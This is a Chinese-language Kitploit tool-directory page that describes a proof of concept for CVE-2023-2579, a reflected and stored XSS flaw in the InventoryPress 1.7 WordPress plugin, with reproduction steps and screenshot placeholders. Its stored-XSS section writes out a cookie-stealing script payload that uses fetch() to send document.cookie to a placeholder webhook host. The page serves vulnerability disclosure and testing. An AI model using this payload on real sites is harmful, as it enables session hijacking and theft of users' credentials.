Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
poc-cve-xss-inventory-press-plugin — CVE-2023-2579 的 PoC | Kitploit
工具/GitHubGitHub/0xn4d/poc-cve-xss-inventory-press-plugin
漏洞分析漏洞利用Web应用程序漏洞利用Web安全渗透测试Payload 开发
GitHub0xn4d/poc-cve-xss-inventory-press-plugin

poc-cve-xss-inventory-press-plugin

CVE-2023-2579 的 PoC

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
查看仓库
123年前尚未审核
分享

更新 - 6-23-2023

CVE-2023-2579 ID 已被保留,PoC 已在 WPScan 网站上发布: https://wpscan.com/vulnerability/3cfcb8cc-9c4f-409c-934f-9f3f043de6fe

详细信息

标题:InventoryPress WordPress CMS 插件中的认证反射型跨站脚本漏洞
日期:2023-04-21
作者:Danilo Albuquerque
供应商主页:https://wordpress.org
软件链接:https://wordpress.org/download
版本:WordPress 6.2
插件名称及版本:InventoryPress 1.7
测试环境:Brave(版本 1.50.119 Chromium:112.0.5615.121(官方版本)64位)

InventoryPress 1.7 反射型 XSS 漏洞的 PoC

  1. 转到可以添加物品到库存的页面;
  2. 将恶意载荷添加到表单的"描述"输入框中;
  3. 访问插件生成的新物品链接;

完成上述步骤并刷新当前页面后,会弹出一个包含该消息的警告弹窗。

下面为截图

  1. 转到可以添加物品到库存的页面:
    image

  2. 将恶意载荷添加到表单的"描述"输入框中:
    image

  3. 访问插件生成的新物品链接:
    image

  • 请求完成后,显示警告弹窗:
    image

  • 附加内容 - 存储型 XSS 的 PoC

    1. 将以下用于窃取 Cookie 的恶意载荷添加到"描述"输入框中:<script>fetch('https://webhooksite-to-get-the-request', {method: 'POST',mode: 'no-cors',body:document.cookie});</script>。然后发布新物品,或更新旧物品;

    2. 触发并在 Webhook 站点获取凭据

    3. 添加载荷并发布物品(或更新它): image

    4. 触发并获取凭据: image

    下载工具